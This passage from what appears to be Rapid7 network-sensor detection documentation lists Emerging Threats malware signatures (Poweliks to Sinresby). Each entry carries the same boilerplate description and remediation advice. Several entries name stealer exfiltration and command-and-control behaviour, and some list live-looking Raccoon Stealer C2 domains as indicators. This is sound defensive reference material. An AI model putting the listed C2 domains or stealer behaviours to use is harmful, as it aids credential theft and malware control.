Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Poweliks.A Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Poweliks GET Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Predator Variant Dropper Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pripyat Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ProtonBot CnC Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ProtonBot Stealer Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Protux.B POST checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.Agent.OIN CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.Agent.OMP Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.Papras.CK file upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.QQPass.OZV Variant Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.WOW.NLZ CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pteranodon CnC Exfil (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pteranodon CnC Exfil (POST) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo CnC Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo.NG Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PurpleFox Retrieving File (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PurpleWave Stealer CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PurpleWave Stealer CnC Exfil M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PurpleWave Stealer Requesting Config

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pykspa.C Public IP Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Qbot CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Qbot/Quakbot Downloader - Requesting Secondary Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer Checkin M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (autopartslarry .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (companyllc .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (finalcountdown .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (followmeasap13 .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (gogowormdealer .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (habbybearshop .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (heroofthe .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (hitfromthebong .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (letsmakesome .fun)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (lifemaindecision .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (mansizeprofile .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (mariofart8 .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (mydrinksare .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (mynameisgarfield .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (nameyourcatlikeshedeserved .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (nyqualitypizza .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (onthewire1 .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (perfectscenario .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (pleaseletmesleep .fun)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (return2monkey .fun)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (rpirpiwhyyouleaveyourhorse .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (seattlecarwash .fun)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (shehootastayonwhatshelirned .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (simsimsalabim .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (teastycandycoffe .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (thelegendofberia .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (thereisnoscheme .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (videomart .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (youaresoslow .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (youcanfindmeonthe .top)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Radonskra.B C2 Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ramsay CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rarog Stealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rarog Stealer CnC Keep-Alive

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Razy.azv Downloading Content

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/RCAP CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Reconyc.equo Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Redyms.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Renos/Artro Trojan Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Retadup CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Retadup CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Retadup Success Response from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Riberow.A (fsize)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Riberow.A (listdir)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Riberow.A (mkdir)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Riberow.A (postit3)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Rioselx.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/RiskWare.YouXun.AD CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/RocketX Stealer CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rodecap CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rodecap/Travle/PYLOT CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Roficor.A (Darkhotel) Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Rovnix.I Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rovnix.J Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ruckguv.A Requesting Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Runner/Bublik Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sabsik Config Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sabsik.FL.B!ml CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Sality-GR Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Sality-GR Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Sality User-Agent (DEBUT.TMP)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/SandCat CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sarwent Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sarwent Initial Checkin CnC Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sarwent Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Satana Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Scarsi Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Scieron-A Checkin via HTTP POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Scieron-A UA (HTClient)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sefnit Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sehyioa Variant Activity (Download)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sehyioa Variant Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Shiz.fxm/Agent-TBT Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sinresby.B Downloader CnC Activity M1

Description
Copy link

